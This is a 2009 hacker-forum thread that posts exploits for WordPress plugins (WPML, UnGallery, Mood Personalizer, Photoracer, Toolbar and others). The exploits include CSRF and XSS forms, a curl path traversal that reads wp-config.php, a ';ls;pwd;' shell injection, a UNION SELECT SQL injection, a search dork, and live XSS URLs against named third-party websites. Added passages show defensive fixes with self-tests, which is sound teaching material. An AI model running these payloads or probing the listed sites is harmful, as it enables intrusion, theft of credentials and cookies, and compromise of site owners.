
16.06.2009, 11:34 (Members of Antichat - Level 5, registered 09.05.2008)
WordPress plugins
WPML Multilingual CMS
Version: 1.0.0
Last Updated: 2009-6-9
Downloads: 9,424
XSS (PoC)
Code:
<!-- Hidden auto-submitting form: a cross-site POST to the plugin's AJAX handler -->
<div style="display:none;">
<form action='http://wordpress/wp-content/plugins/sitepress-multilingual-cms/ajax.php?icl_ajx_action=set_default_language' method='post' target="ifr" name="xfrm">
<!-- the script payload is sent as the new default language -->
<input name="lang" type="text" value="<script>alert(document.cookie)</script>" />
<input type='submit'>
</form>
<iframe src="" name="ifr" width="1" height="1"></iframe>
<script>
document.xfrm.submit();                      // first submit: send the payload
document.xfrm.lang.value="en";               // then put the default language back
setTimeout('document.xfrm.submit()', 1000);  // second submit one second later
</script>
</div>
PHPINFO
Code:
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/inc/php-version-check.php?icl_phpinfo=1
XSS (register_globals = On)
Code:
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/menu/language-selector.php?w_this_lang="><script>alert(document.cookie)</script>
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/modules/absolute-links/management-page.php?total_posts_pages="><script>alert(document.cookie)</script>
__________________
use your head

16.06.2009, 12:17 (Members of Antichat - Level 5, registered 09.05.2008)
UnGallery
Version: 0.8
Updated: 2009-6-11
Downloads: 226
Remote File Disclosure
PHP code:
if ($_GET['pic']) {
$filename = $_GET['pic']; // raw request value used as a filesystem path, no validation
$len = filesize($filename);
$lastslash = strrpos($filename, "/");
$name = substr($filename, $lastslash + 1);
header("Content-type: image/jpeg;\r\n");
header("Content-Length: $len;\r\n");
header("Content-Transfer-Encoding: binary;\r\n");
header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline.
readfile($filename); // returns any file the web server process can read
}
Code:
$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP code:
$dir = "wp-content/plugins/ungallery/pics/" . $_GET['zip']; // request value becomes part of the directory path
// Create the arrays with the dir's image files
$dp = opendir($dir);
while ($filename = readdir($dp)) {
if (!is_dir($dir."/pics/".$gallery. "/". $filename)) { // If it's a file, begin
$pic_types = array("JPG", "jpg", "GIF", "gif", "PNG", "png");
if (in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename; // If it's a image, add it to pic array
}
}
foreach ($pic_array as $filename) {
$media_files = $media_files . " " . $dir . "/" . $filename;
}
$output = `zip -u -j $dir/pics.zip $media_files`; // $dir is interpolated unquoted into a shell command
print "<pre>$output</pre>";
print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' . $_GET['zip'] . '/pics.zip">here</a>';
print '<br><br>You can return to the gallery <a href="./gallery?gallerylink=' . $_GET['zip'] .'">here.</a>';
Code:
http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
PS: XSS can be pulled off here as well.
__________________
use your head
Last edited by oRb; 16.06.2009 at 16:32.
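Added hardening example for the two UnGallery bugs above (the `pic` file read and the `zip` shell command). This is not UnGallery's code; the function names, the `$base` directory layout and the fixture files it creates under the system temp directory are assumptions made for illustration. It canonicalises the requested path with `realpath()` and checks the result against the gallery root, restricts gallery names to an allow-listed token before they reach any path or command, and builds the `zip` command with every operand passed through `escapeshellarg()`. The command is returned instead of executed so the script runs without `zip` installed.

```php
<?php
// Added example, not UnGallery's code. Names, layout and fixtures are assumptions.

// Resolve a user-supplied relative path and confirm it stays under $base.
// realpath() collapses "..", "." and symlinks, so the prefix comparison is made
// on the canonical path rather than on the raw request string.
function safe_pic_path(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Reject empty input, embedded NUL bytes and absolute paths outright.
    if ($userPath === '' || strpos($userPath, "\0") !== false || $userPath[0] === '/') {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null; // the readfile() target must exist anyway
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// A gallery name is an allow-listed token, never a path, so the posted
// "non_existing_dir non_existing_file;ls;pwd;" is rejected before any shell runs.
function valid_gallery_name(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name);
}

// Build the zip command with every operand quoted; returned, not executed,
// so it can be inspected offline.
function build_zip_command(string $dir, array $files): string
{
    $argv = ['zip', '-u', '-j', $dir . '/pics.zip'];
    foreach ($files as $f) {
        $argv[] = $dir . '/' . $f;
    }
    return implode(' ', array_map('escapeshellarg', $argv));
}

// --- self-test on a constructed fixture directory -------------------------
$tmp = sys_get_temp_dir() . '/ungallery_demo_' . getmypid();
mkdir("$tmp/pics/holiday", 0700, true);
file_put_contents("$tmp/pics/holiday/a.jpg", 'jpg');
file_put_contents("$tmp/secret.php", 'secret'); // stands in for wp-config.php

$checks = [
    safe_pic_path("$tmp/pics", 'holiday/a.jpg') === realpath("$tmp/pics/holiday/a.jpg"),
    safe_pic_path("$tmp/pics", '../secret.php') === null,           // the posted PoC
    safe_pic_path("$tmp/pics", 'holiday/../../secret.php') === null,
    valid_gallery_name('holiday') === true,
    valid_gallery_name('non_existing_dir non_existing_file;ls;pwd;') === false,
    build_zip_command("$tmp/pics/holiday", ['a.jpg'])
        === "'zip' '-u' '-j' '$tmp/pics/holiday/pics.zip' '$tmp/pics/holiday/a.jpg'",
];

unlink("$tmp/pics/holiday/a.jpg");
unlink("$tmp/secret.php");
rmdir("$tmp/pics/holiday");
rmdir("$tmp/pics");
rmdir($tmp);

if (in_array(false, $checks, true)) {
    fwrite(STDERR, "hardening self-test FAILED\n");
    exit(1);
}
echo "all checks passed\n";
```

Run it with `php ungallery_hardening.php` on a POSIX host (the absolute-path test assumes `/` as the root separator). Note that `realpath()` requires the target to exist, which is the right behaviour for a download endpoint but would need a different check for code that creates files.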

16.06.2009, 13:12 (Members of Antichat - Level 5, registered 09.05.2008)
Mood Personalizer
Version: 1.1
Last Updated: 2009-6-11
Downloads: 453
XSS/XSRF
Code:
<!-- auto-submitting cross-site form; the handler checks only the static xMPHidd marker -->
<form action='http://wordpress/wp-admin/options-general.php?page=mood-personalizer/mood-personalizer.php' method='post' name="xfrm">
<input name="xMPPic" type="text" value='"><script>alert(document.cookie)</script>' />
<input name="xMPHidd" type="text" value='xMPHidd' />
<input type='submit'>
</form>
<script>document.xfrm.submit();</script>
PHP code:
if($_POST['xMPHidd']=="xMPHidd"){ // only a fixed marker field is checked: no nonce, no capability check
$xMPPicture = $_POST['xMPPic'];
$xMPPictureSize = $_POST['xMPPictureSize'];
$xMPPicture = str_replace(".2",".".$xMPPictureSize,$xMPPicture);
update_option('xMPPic', $xMPPicture); // stored raw
}
PHP code:
<img src="<?php bloginfo('url'); ?>/wp-content/plugins/mood-personalizer/images/<?php echo get_option('xMPPic');?>" alt="Mood Personalizer mood image"/>
If the widget is placed in the sidebar, you get stored XSS on the front page.
__________________
use your head

16.06.2009, 17:47 (Regular, registered 16.02.2008)
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Greetings to everyone from the dc++ hub and to everyone on the forum,
Shout-outs: Ratman, Kopaczka, FDJ
Props to GLOBUS for the help with cracking passwords.
Vuln:
Code:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all
# milw0rm.com [2009-06-15]
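Added example for the Photoracer `id` injection above; it is not the plugin's code and the `photos` table, its columns and the function names are invented. The posted PoC works because the `id` value is pasted into the query text, so `-1 union select ...` replaces the result set. The example reproduces that against an in-memory SQLite table (the `user()` column from the PoC becomes `sqlite_version()`) and shows the fix: validate that `id` is a plain integer and bind it as a parameter. Requires the `pdo_sqlite` extension.

```php
<?php
// Added example, not the Photoracer plugin's code. Table, columns and names are invented.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, path TEXT)');
    $db->exec("INSERT INTO photos VALUES (1, 'race day', 'img/1.jpg')");
    return $db;
}

// Vulnerable: $id goes straight into the SQL text, so a value such as
// "-1 union select 0,'x',sqlite_version()" rewrites the statement.
function view_image_vulnerable(PDO $db, string $id): ?array
{
    $row = $db->query("SELECT id, title, path FROM photos WHERE id = $id")
              ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Fixed: the value is validated and bound as an integer parameter; it can never
// become SQL. (In a WordPress plugin the equivalent is
// $wpdb->prepare('... WHERE id = %d', $id).)
function view_image_fixed(PDO $db, string $id): ?array
{
    if (!preg_match('/\A\d{1,10}\z/', $id)) {
        return null; // reject anything that is not a plain id
    }
    $stmt = $db->prepare('SELECT id, title, path FROM photos WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = make_db();
// SQLite counterpart of the posted "-1 union select ... user() ..." payload.
$payload = "-1 union select 0, 'injected', sqlite_version()";

$leak  = view_image_vulnerable($db, $payload); // attacker-chosen row comes back
$safe  = view_image_fixed($db, $payload);      // rejected: null
$legit = view_image_fixed($db, '1');           // the real row for id 1

echo "vulnerable: ", json_encode($leak), "\n";
echo "fixed:      ", json_encode($safe), "\n";
echo "legit:      ", json_encode($legit), "\n";

if ($leak === null || $leak['title'] !== 'injected' || $safe !== null
    || $legit === null || (int) $legit['id'] !== 1) {
    fwrite(STDERR, "demo assertions failed\n");
    exit(1);
}
```

The integer regex is deliberately stricter than a cast: `(int) "1 union ..."` would silently become `1`, which hides the attack attempt instead of rejecting (and logging) it.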

30.06.2009, 19:08 (Regular, registered 15.06.2008)
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP code:
89: if($_POST['advanced_twitter_widget_value']!=""){
90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
94: update_option('advanced_twitter_widget_options', serialize($xArrOptions));
95: }
97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Code:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.

30.06.2009, 19:09 (Regular, registered 15.06.2008)
WordPress Plugin ImHuman 0.0.9 XSS Vuln
http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
\imhuman.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP code:
151: if(isset( $_POST['do'] )) {
152: if ( function_exists('current_user_can') && !current_user_can('manage_options') )
153: die(__('Cheatin’ uh?'));
154: check_admin_referer($plugin_page);
155:
156: $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
157: $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
158: $t['imhuman_row'] = $_POST['imhuman_row'];
159: $t['imhuman_col'] = $_POST['imhuman_col'];
160: $t['imhuman_sel'] = $_POST['imhuman_sel'];
161: $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
162: $t['imhuman_word'] = $_POST['imhuman_word'];
163: $t['imhuman_lang'] = $_POST['imhuman_lang'];
164: update_option( 'imhuman_options', $t );
165: $m = '<p>Settings Saved!</p>';
166: }
167: $options = get_option( 'imhuman_options' );
....
194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
195: </tr>
196: <tr>
197: <th><?php _e('ImHuman Api Key'); ?></th>
198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
exploit:
Code:
POST: do=.
POST: imhuman_api_user=">{XSS1}<a "
POST: imhuman_api_key=">{XSS1}<a "
POST: imhuman_row=.
POST: imhuman_col=.
POST: imhuman_sel=.
POST: imhuman_word=.
POST: imhuman_lang=.

30.06.2009, 22:48 (Regular, registered 15.06.2008)
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
http://www.appchain.com/2009/06/live-countdown-timer-1-1/
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
\live-countdown-timer\live-countdown-timer.php
-----------------------------------------------------------------------------
142: $xPostArr[0] = $_POST['live_countdown_timer_Title'];
147: update_option('live_countdown_timer_Values', serialize($xPostArr));
....
149: $xDBArr = unserialize(get_option('live_countdown_timer_Values'));
150: $live_countdown_timer_Title = $xDBArr[0];
169: <input type="tex...le" value="<?php echo $live_countdown_timer_Title;?>" />
-----------------------------------------------------------------------------
exploit:
POST: live_countdown_timer_days = .
POST: live_countdown_timer_Title = ">{aXSS}<div id="
POST: live_countdown_timer_seconds = 12
POST: live_countdown_timer_hours = 11
POST: live_countdown_timer_days = 10

30.06.2009, 22:50 (Regular, registered 15.06.2008)
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = .
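Added example covering the pattern shared by the Mood Personalizer, Advanced Twitter Widget, ImHuman, Live Countdown Timer and simple-sidebar-navigation posts above (and the cross-site form in the WPML PoC): a `$_POST` value is saved as an option and later echoed into a `value=""` attribute unescaped. It is not code from any of those plugins. The option store, the HMAC token scheme, the field names and the session identifier are stand-ins chosen so the script runs without WordPress; in a real plugin the same two controls are `check_admin_referer()` with `wp_nonce_field()` plus `current_user_can('manage_options')` on save, and `esc_attr()` at output. Note that ImHuman's posted code already has the nonce and capability checks, so there only the output escaping is missing.

```php
<?php
// Added example, not code from any plugin above. Token scheme, store and names are stand-ins.

function make_token(string $secret, string $action, string $session): string
{
    return hash_hmac('sha256', $action . '|' . $session, $secret);
}

function token_valid(string $secret, string $action, string $session, string $given): bool
{
    return hash_equals(make_token($secret, $action, $session), $given);
}

// Save handler: refuses the request unless it carries the token bound to the
// current admin session, so a forged cross-site form cannot write the option.
function save_settings(array &$store, array $post, string $secret, string $session): bool
{
    if (!isset($post['_token'])
        || !token_valid($secret, 'save-settings', $session, (string) $post['_token'])) {
        return false;
    }
    // Store raw, as update_option() does; escaping belongs to the output context.
    $store['widget_title'] = (string) ($post['widget_title'] ?? '');
    return true;
}

// Output: htmlspecialchars() with ENT_QUOTES turns both " and ' into entities,
// so the '">{XSS}<a "' payload from the posts stays inside the attribute.
function render_title_input(array $store): string
{
    $v = htmlspecialchars($store['widget_title'] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="widget_title" value="' . $v . '" />';
}

// Unescaped rendering, as in the posted plugin code, kept for comparison.
function render_title_input_unsafe(array $store): string
{
    return '<input type="text" name="widget_title" value="' . ($store['widget_title'] ?? '') . '" />';
}

// --- demo ---------------------------------------------------------------
$options = [];                                    // stand-in for the options table
$secret  = 'constructed-server-secret';
$session = 'admin-session-42';
$payload = '"><script>alert(document.cookie)</script><a "';

// 1. Forged request without a token: rejected, option untouched.
$forged = save_settings($options, ['widget_title' => $payload], $secret, $session);

// 2. Legitimate admin request carrying the payload: stored raw ...
$ok = save_settings($options, [
    'widget_title' => $payload,
    '_token'       => make_token($secret, 'save-settings', $session),
], $secret, $session);

// ... but rendered inert.
$safe   = render_title_input($options);
$unsafe = render_title_input_unsafe($options);
echo $unsafe, "\n", $safe, "\n";

$checks = [
    $forged === false,
    $ok === true,
    strpos($unsafe, '<script>') !== false,               // the bug
    strpos($safe, '<script>') === false,                 // fixed
    strpos($safe, '&quot;&gt;&lt;script&gt;') !== false,
];
if (in_array(false, $checks, true)) {
    fwrite(STDERR, "demo assertions failed\n");
    exit(1);
}
```

Escaping at output rather than on save is deliberate: the same option may later be printed into a different context (the Mood Personalizer post shows it landing in an `<img src>` on the front page), and each context needs its own encoder.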

02.07.2009, 21:36 (Regular, registered 15.06.2008)
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
Code:
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
Dork: "inurl:wp-toolbar.php"
## ## ## ##
eLwaux(c)2009 UASC.org.ua
## ## ## ##
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
## ## ## ##
XSS
/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30: $tourl = $_GET['wp-toolbar-tourl'];
42: $blogtitle = $_GET['wp-toolbar-blogtitle'];
52: <title><?php echo $blogtitle; ?> - Toolbar</title>
56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------
PoC:
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
example:
http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
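Added example for the two reflected XSS sinks in the Wordpress Toolbar post above: text inside `<title>` (where a literal `</title>` ends the element) and a URL inside an iframe `src` attribute (where a quote breaks out, and where `javascript:` would execute even if quoted). It is not the plugin's code; the function names and the allowed-host list are assumptions. For the path-disclosure item, the usual guard is a direct-access check at the top of each plugin file, shown as a comment since it depends on the WordPress `ABSPATH` constant.

```php
<?php
// Added example, not the Wordpress Toolbar plugin's code. Names are invented.
//
// Direct-access guard for plugin files (WordPress idiom; stops the
// "call to undefined function add_action()" fatal error with a full path):
//   if (!defined('ABSPATH')) { exit; }

// <title> is raw-text content, so "<" and ">" must be entity-encoded to keep
// the browser inside the element.
function safe_title(string $blogTitle): string
{
    return '<title>' . htmlspecialchars($blogTitle, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . ' - Toolbar</title>';
}

// A URL destined for src="" needs two checks: it must parse as an absolute
// http(s) URL (rejecting javascript:, data: and scheme-relative "//evil"), and
// it must be attribute-escaped so a quote cannot close src="".
function safe_iframe_url(string $url, ?array $allowedHosts = null): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if ($allowedHosts !== null && !in_array(strtolower($p['host']), $allowedHosts, true)) {
        return null; // optional: limit what the toolbar will frame
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_frame(string $url, ?array $allowedHosts = null): string
{
    $src = safe_iframe_url($url, $allowedHosts);
    if ($src === null) {
        return '<p>Invalid target URL.</p>';
    }
    return '<iframe frameborder="0" src="' . $src . '"></iframe>';
}

// --- demo with the payloads from the posted PoCs ------------------------
$titleOut = safe_title('</title><script>alert(/xss/);</script>');
$frameOut = render_frame('"><script>alert(/xss2/);</script><div id="');
$jsOut    = render_frame('javascript:alert(1)');
$goodOut  = render_frame('https://example.com/page?q=a&b=c', ['example.com']);
$otherOut = render_frame('https://evil.example/', ['example.com']);

echo $titleOut, "\n", $frameOut, "\n", $jsOut, "\n", $goodOut, "\n", $otherOut, "\n";

$checks = [
    strpos($titleOut, '</title><script>') === false,
    strpos($titleOut, '&lt;/title&gt;') !== false,
    $frameOut === '<p>Invalid target URL.</p>',
    $jsOut === '<p>Invalid target URL.</p>',
    $goodOut === '<iframe frameborder="0" src="https://example.com/page?q=a&amp;b=c"></iframe>',
    $otherOut === '<p>Invalid target URL.</p>',
];
if (in_array(false, $checks, true)) {
    fwrite(STDERR, "demo assertions failed\n");
    exit(1);
}
```

The scheme allow-list matters as much as the escaping: a `javascript:` URL passes `htmlspecialchars()` untouched and still runs when the frame loads, so encoding alone does not fix the `src` sink.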

02.07.2009, 21:56 (Forum member, registered 08.05.2007)
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
Stuff like this isn't worth publishing, since it's in practically every WordPress plugin and include file ;D